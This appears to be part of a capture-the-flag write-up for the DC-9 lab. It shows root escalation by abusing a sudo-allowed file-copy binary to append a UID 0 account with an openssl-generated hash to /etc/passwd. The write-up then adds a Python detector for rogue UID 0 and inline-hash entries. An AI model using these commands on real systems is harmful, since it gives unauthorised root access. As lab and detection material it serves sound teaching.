sudo privileges
It has been identified that the fredf user has sudo privileges to execute the /opt/devstuff/dist/test/test command as the root account without being prompted for a password.
The /opt/devstuff/dist/test/test file appears to be the compiled binary version of the Python script /opt/devstuff/test.py.
The Python script:
- Reads the file given as its first argument.
- Writes the content of that file to the file given as its second argument.
fredf@dc-9:~$ openssl passwd qwe123
wGjkkGNAt0rG2
Creating a password hash using openssl.
fredf@dc-9:~$ echo 'r00t:wGjkkGNAt0rG2:0:0:r00t:/root:/bin/bash' > pe
Building a "root" profile (a UID 0 entry with the hash created above) into the pe file.
fredf@dc-9:~$ sudo -u root /opt/devstuff/dist/test/test ./pe /etc/passwd
The command above runs the binary as root, which reads the pe file containing the "root" profile and appends it to the /etc/passwd file.
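The artefact this leaves behind is a second UID 0 entry in /etc/passwd, which is a simple thing to check for. The following is an added defender-side check, not part of the original write-up: it parses /etc/passwd text and reports any non-root UID 0 entry or any entry carrying a hash directly in the password field; the sample file is constructed here and includes the appended line from above.

```python
"""Detect extra UID-0 accounts and inline hashes in /etc/passwd content."""


def parse_passwd(text):
    """Parse /etc/passwd lines into dicts; blank and comment lines are skipped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            # Malformed line: keep it so it can be reported, then continue.
            entries.append({"line": lineno, "malformed": True, "raw": line})
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({
            "line": lineno, "name": name, "pw": pw,
            "uid": uid, "gid": gid, "home": home, "shell": shell,
        })
    return entries


def find_rogue_root_accounts(text):
    """Return (kind, name) findings: UID 0 entries other than 'root',
    entries with a hash stored in /etc/passwd instead of /etc/shadow,
    and malformed lines."""
    findings = []
    for e in parse_passwd(text):
        if e.get("malformed"):
            findings.append(("malformed", e["raw"]))
            continue
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(("uid0", e["name"]))
        # A healthy entry has 'x' (shadowed) or a locked marker here.
        if e["pw"] and e["pw"] not in ("x", "*", "!"):
            findings.append(("inline_hash", e["name"]))
    return findings


# Constructed sample: a normal passwd file plus the line appended in the write-up.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1001:1001::/home/fredf:/bin/bash
r00t:wGjkkGNAt0rG2:0:0:r00t:/root:/bin/bash
"""

if __name__ == "__main__":
    for kind, who in find_rogue_root_accounts(SAMPLE_PASSWD):
        print(f"{kind}: {who}")
```

On a live host the same function can be fed the output of `cat /etc/passwd`, and a non-empty result is worth an alert.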
System level compromise